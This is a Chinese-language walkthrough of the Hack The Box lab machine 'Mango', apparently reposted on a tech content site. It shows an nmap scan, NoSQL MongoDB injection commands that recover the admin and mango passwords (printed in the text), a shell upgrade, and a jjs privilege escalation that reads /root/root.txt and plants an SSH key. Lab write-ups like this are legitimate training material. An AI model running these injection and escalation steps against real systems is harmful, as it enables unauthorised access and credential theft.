HTB Mango的滲透測試實例

這篇文章主要講解了“HTB Mango的滲透測試實例”，文中的講解內容簡單清晰，易于學習與理解，下面請大家跟著小編的思路慢慢深入，一起來研究和學習“HTB Mango的滲透測試實例”吧！

前言

本次演練使用kali系統按照滲透測試的過程進行操作，通過前期的信息收集與普通注入不能獲取到有用的信息，通過谷歌諸侯知道，可以利用 Nosql-MongoDB-injection爬取賬號與密碼，使用ssh遠程連接獲取user.txt最終通過提權獲取root.txt。

一、信息收集

1、靶機ip

ip地址為：10.129.1.219

2、靶機端口與服務

nmap -sV -A -O 10.129.1.219

獲取到開放端口與版本信息并且獲得了正在使用的域名信息

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))

3、網站信息收集

查看80與443端口
發現443端口是一個類似于谷歌的搜索界面通過證書獲得一些信息

二、漏洞探測與利用

Nosql-MongoDB-injection

將重點放在80端口，這個端口是一個登錄界面，經過嘗試通過普通的sql注入無法爬取到有用的信息
通過谷歌發現存在Nosql-MongoDB-injection可以利用腳本進行注入嘗試獲取賬號與密碼
鏈接：https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login,submit:submit
python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login,submit:submit

用戶：admin 密碼：t9KcS3>!0B#2
用戶：mango 密碼：h4mXK8RhU~f{]f5H

使用獲得的賬號密碼進行登錄
無論使用哪一個都會跳轉到這個界面
通過ssh進行遠程連接 并跳轉到admin用戶，否則無法查看到admin文件夾下的user.txt

三、提權

獲取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

使用LinEnum.sh查看是否存在可利用信息
最終根據提示找到了jjs可以利用jjs進行提權
使用GTFOBins 查看可利用腳本
鏈接：https://gtfobins.github.io/
(1) 通過運行文件讀取命令直接獲得root.txt

var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }

(2) 通過jjs上傳我們自己生成的ssh公鑰然后使用我們自己的私鑰進行連接獲取root權限

ssh-keygen

完善腳本信息

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("./file_to_write");
fw.write("DATA");
fw.close();' | jjs

在獲取的shell中執行腳本最后在kali中進行登錄獲取root權限

感謝各位的閱讀，以上就是“HTB Mango的滲透測試實例”的內容了，經過本文的學習后，相信大家對HTB Mango的滲透測試實例這一問題有了更深刻的體會，具體使用情況還需要大家實踐驗證。這里是億速云，小編將為大家推送更多相關知識點的文章，歡迎關注！